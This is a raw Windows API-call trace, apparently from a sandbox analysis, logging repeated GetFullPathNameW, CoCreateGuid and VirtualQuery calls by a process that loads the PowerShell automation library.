	[0285.756] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.756] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.756] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.756] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0x95ad1dc7, Data2=0xbb0, Data3=0x43a7, Data4=([0]=0xbd, [1]=0xb8, [2]=0x63, [3]=0xac, [4]=0x1a, [5]=0x34, [6]=0x82, [7]=0x65))) returned 0x0
	[0285.757] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.757] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.757] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.757] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.757] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.757] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.758] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0x27955d45, Data2=0x1d10, Data3=0x4d97, Data4=([0]=0x96, [1]=0x20, [2]=0x1a, [3]=0xa1, [4]=0x23, [5]=0x62, [6]=0x76, [7]=0x2a))) returned 0x0
	[0285.758] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0x591180fb, Data2=0xbd1e, Data3=0x42c3, Data4=([0]=0xaf, [1]=0xa6, [2]=0x0, [3]=0x38, [4]=0xf4, [5]=0x59, [6]=0xdc, [7]=0x3f))) returned 0x0
	[0285.758] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0xd79d0115, Data2=0x83af, Data3=0x4688, Data4=([0]=0x8a, [1]=0x86, [2]=0x82, [3]=0x49, [4]=0x1c, [5]=0xc5, [6]=0x6c, [7]=0x91))) returned 0x0
	[0285.758] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.758] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.758] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.759] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.759] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.759] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.759] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0x1f5618b2, Data2=0xcd57, Data3=0x4183, Data4=([0]=0x88, [1]=0xa, [2]=0x8a, [3]=0x7f, [4]=0xab, [5]=0xa1, [6]=0x23, [7]=0x83))) returned 0x0
	[0285.759] VirtualQuery (in: lpAddress=0x16b330, lpBuffer=0x16c1f0, dwLength=0x30 | out: lpBuffer=0x16c1f0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.759] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16beb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.760] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16be00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0286.544] VirtualQuery (in: lpAddress=0x16b330, lpBuffer=0x16c1f0, dwLength=0x30 | out: lpBuffer=0x16c1f0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.544] VirtualQuery (in: lpAddress=0x16b3c0, lpBuffer=0x16c280, dwLength=0x30 | out: lpBuffer=0x16c280*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.544] VirtualQuery (in: lpAddress=0x16b330, lpBuffer=0x16c1f0, dwLength=0x30 | out: lpBuffer=0x16c1f0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.544] VirtualQuery (in: lpAddress=0x16b3c0, lpBuffer=0x16c280, dwLength=0x30 | out: lpBuffer=0x16c280*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.545] VirtualQuery (in: lpAddress=0x16b330, lpBuffer=0x16c1f0, dwLength=0x30 | out: lpBuffer=0x16c1f0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.545] VirtualQuery (in: lpAddress=0x16b3c0, lpBuffer=0x16c280, dwLength=0x30 | out: lpBuffer=0x16c280*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.545] VirtualQuery (in: lpAddress=0x16b330, lpBuffer=0x16c1f0, dwLength=0x30 | out: lpBuffer=0x16c1f0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.545] VirtualQuery (in: lpAddress=0x16b3c0, lpBuffer=0x16c280, dwLength=0x30 | out: lpBuffer=0x16c280*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.545] VirtualQuery (in: lpAddress=0x16b330, lpBuffer=0x16c1f0, dwLength=0x30 | out: lpBuffer=0x16c1f0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.545] VirtualQuery (in: lpAddress=0x16b3c0, lpBuffer=0x16c280, dwLength=0x30 | out: lpBuffer=0x16c280*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.546] VirtualQuery (in: lpAddress=0x16b330, lpBuffer=0x16c1f0, dwLength=0x30 | out: lpBuffer=0x16c1f0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.546] VirtualQuery (in: lpAddress=0x16b3c0, lpBuffer=0x16c280, dwLength=0x30 | out: lpBuffer=0x16c280*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.546] VirtualQuery (in: lpAddress=0x16bc30, lpBuffer=0x16caf0, dwLength=0x30 | out: lpBuffer=0x16caf0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.546] VirtualQuery (in: lpAddress=0x16bcc0, lpBuffer=0x16cb80, dwLength=0x30 | out: lpBuffer=0x16cb80*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.547] VirtualQuery (in: lpAddress=0x16bc30, lpBuffer=0x16caf0, dwLength=0x30 | out: lpBuffer=0x16caf0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.547] VirtualQuery (in: lpAddress=0x16bcc0, lpBuffer=0x16cb80, dwLength=0x30 | out: lpBuffer=0x16cb80*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.547] VirtualQuery (in: lpAddress=0x16bcc0, lpBuffer=0x16cb80, dwLength=0x30 | out: lpBuffer=0x16cb80*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.547] VirtualQuery (in: lpAddress=0x16bc30, lpBuffer=0x16caf0, dwLength=0x30 | out: lpBuffer=0x16caf0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.547] VirtualQuery (in: lpAddress=0x16bcc0, lpBuffer=0x16cb80, dwLength=0x30 | out: lpBuffer=0x16cb80*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.547] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0x27c79f42, Data2=0x9f19, Data3=0x492b, Data4=([0]=0xb3, [1]=0xf3, [2]=0xeb, [3]=0xe7, [4]=0xb3, [5]=0x94, [6]=0xe8, [7]=0xe7))) returned 0x0
	[0286.547] VirtualQuery (in: lpAddress=0x16bc40, lpBuffer=0x16cb00, dwLength=0x30 | out: lpBuffer=0x16cb00*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.547] VirtualQuery (in: lpAddress=0x16bc40, lpBuffer=0x16cb00, dwLength=0x30 | out: lpBuffer=0x16cb00*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.548] VirtualQuery (in: lpAddress=0x16bcd0, lpBuffer=0x16cb90, dwLength=0x30 | out: lpBuffer=0x16cb90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.548] VirtualQuery (in: lpAddress=0x16bc40, lpBuffer=0x16cb00, dwLength=0x30 | out: lpBuffer=0x16cb00*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.548] VirtualQuery (in: lpAddress=0x16bcd0, lpBuffer=0x16cb90, dwLength=0x30 | out: lpBuffer=0x16cb90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.548] VirtualQuery (in: lpAddress=0x16bc40, lpBuffer=0x16cb00, dwLength=0x30 | out: lpBuffer=0x16cb00*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.548] VirtualQuery (in: lpAddress=0x16bcd0, lpBuffer=0x16cb90, dwLength=0x30 | out: lpBuffer=0x16cb90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.548] VirtualQuery (in: lpAddress=0x16bc40, lpBuffer=0x16cb00, dwLength=0x30 | out: lpBuffer=0x16cb00*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.549] VirtualQuery (in: lpAddress=0x16bcd0, lpBuffer=0x16cb90, dwLength=0x30 | out: lpBuffer=0x16cb90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.549] VirtualQuery (in: lpAddress=0x16bc40, lpBuffer=0x16cb00, dwLength=0x30 | out: lpBuffer=0x16cb00*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.549] VirtualQuery (in: lpAddress=0x16bcd0, lpBuffer=0x16cb90, dwLength=0x30 | out: lpBuffer=0x16cb90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.549] VirtualQuery (in: lpAddress=0x16bc40, lpBuffer=0x16cb00, dwLength=0x30 | out: lpBuffer=0x16cb00*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.549] VirtualQuery (in: lpAddress=0x16bcd0, lpBuffer=0x16cb90, dwLength=0x30 | out: lpBuffer=0x16cb90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.550] VirtualQuery (in: lpAddress=0x16bc30, lpBuffer=0x16caf0, dwLength=0x30 | out: lpBuffer=0x16caf0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.550] VirtualQuery (in: lpAddress=0x16bcc0, lpBuffer=0x16cb80, dwLength=0x30 | out: lpBuffer=0x16cb80*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.550] VirtualQuery (in: lpAddress=0x16bc30, lpBuffer=0x16caf0, dwLength=0x30 | out: lpBuffer=0x16caf0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.550] VirtualQuery (in: lpAddress=0x16bcc0, lpBuffer=0x16cb80, dwLength=0x30 | out: lpBuffer=0x16cb80*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.550] VirtualQuery (in: lpAddress=0x16bcc0, lpBuffer=0x16cb80, dwLength=0x30 | out: lpBuffer=0x16cb80*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.550] VirtualQuery (in: lpAddress=0x16bc30, lpBuffer=0x16caf0, dwLength=0x30 | out: lpBuffer=0x16caf0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.550] VirtualQuery (in: lpAddress=0x16bcc0, lpBuffer=0x16cb80, dwLength=0x30 | out: lpBuffer=0x16cb80*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.550] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0x82f32a3f, Data2=0xaca7, Data3=0x45f2, Data4=([0]=0xaf, [1]=0xff, [2]=0x55, [3]=0x3b, [4]=0xee, [5]=0xe, [6]=0xf6, [7]=0x3a))) returned 0x0
	[0286.551] VirtualQuery (in: lpAddress=0x16bc30, lpBuffer=0x16caf0, dwLength=0x30 | out: lpBuffer=0x16caf0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.551] VirtualQuery (in: lpAddress=0x16bcc0, lpBuffer=0x16cb80, dwLength=0x30 | out: lpBuffer=0x16cb80*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.551] VirtualQuery (in: lpAddress=0x16bc30, lpBuffer=0x16caf0, dwLength=0x30 | out: lpBuffer=0x16caf0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.551] VirtualQuery (in: lpAddress=0x16bcc0, lpBuffer=0x16cb80, dwLength=0x30 | out: lpBuffer=0x16cb80*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.551] VirtualQuery (in: lpAddress=0x16bcc0, lpBuffer=0x16cb80, dwLength=0x30 | out: lpBuffer=0x16cb80*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.551] VirtualQuery (in: lpAddress=0x16bc30, lpBuffer=0x16caf0, dwLength=0x30 | out: lpBuffer=0x16caf0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.551] VirtualQuery (in: lpAddress=0x16bcc0, lpBuffer=0x16cb80, dwLength=0x30 | out: lpBuffer=0x16cb80*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.552] VirtualQuery (in: lpAddress=0x16bc30, lpBuffer=0x16caf0, dwLength=0x30 | out: lpBuffer=0x16caf0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.552] VirtualQuery (in: lpAddress=0x16bcc0, lpBuffer=0x16cb80, dwLength=0x30 | out: lpBuffer=0x16cb80*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.552] VirtualQuery (in: lpAddress=0x16bc30, lpBuffer=0x16caf0, dwLength=0x30 | out: lpBuffer=0x16caf0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.552] VirtualQuery (in: lpAddress=0x16bcc0, lpBuffer=0x16cb80, dwLength=0x30 | out: lpBuffer=0x16cb80*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.552] VirtualQuery (in: lpAddress=0x16b900, lpBuffer=0x16c7c0, dwLength=0x30 | out: lpBuffer=0x16c7c0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.552] VirtualQuery (in: lpAddress=0x16bc30, lpBuffer=0x16caf0, dwLength=0x30 | out: lpBuffer=0x16caf0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.552] VirtualQuery (in: lpAddress=0x16bcc0, lpBuffer=0x16cb80, dwLength=0x30 | out: lpBuffer=0x16cb80*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.552] VirtualQuery (in: lpAddress=0x16bc30, lpBuffer=0x16caf0, dwLength=0x30 | out: lpBuffer=0x16caf0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.552] VirtualQuery (in: lpAddress=0x16bcc0, lpBuffer=0x16cb80, dwLength=0x30 | out: lpBuffer=0x16cb80*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.553] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0xe6ac45a, Data2=0xf9a6, Data3=0x4de4, Data4=([0]=0xab, [1]=0x1, [2]=0x8, [3]=0xc3, [4]=0x15, [5]=0x6e, [6]=0xde, [7]=0x77))) returned 0x0
	[0286.553] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0xfee206f8, Data2=0x2dda, Data3=0x4223, Data4=([0]=0xbb, [1]=0xda, [2]=0x61, [3]=0x94, [4]=0xea, [5]=0x84, [6]=0x68, [7]=0xea))) returned 0x0
	[0286.553] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0xc4b025b7, Data2=0xd4e, Data3=0x406a, Data4=([0]=0x9c, [1]=0xde, [2]=0x36, [3]=0x32, [4]=0xc4, [5]=0xba, [6]=0xd4, [7]=0xb5))) returned 0x0
